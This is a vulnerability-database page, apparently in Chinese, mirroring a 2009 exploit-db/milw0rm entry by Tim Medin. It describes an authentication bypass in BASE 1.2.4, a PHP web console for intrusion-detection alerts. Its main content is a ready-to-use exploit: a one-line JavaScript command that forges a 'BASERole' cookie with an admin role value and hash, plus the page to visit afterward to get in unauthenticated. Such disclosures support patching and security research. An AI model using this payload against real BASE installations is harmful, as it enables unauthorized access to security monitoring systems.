BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057935 漏洞类型
发布时间 2009-06-24 更新时间 2009-06-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9009
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Authentication Bypass in BASE version 1.2.4 and prior - Insecure
Cookie Handling Vulnerability

--------------------------------------------

Author.: Tim Medin

Contact: nidem.nidem [at] gmail [d0t] com

-------------------------------------------------------------------------------------------------

Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
path=/";

Note: After creating cookie go to http://[website]/base_main.php

# milw0rm.com [2009-06-24]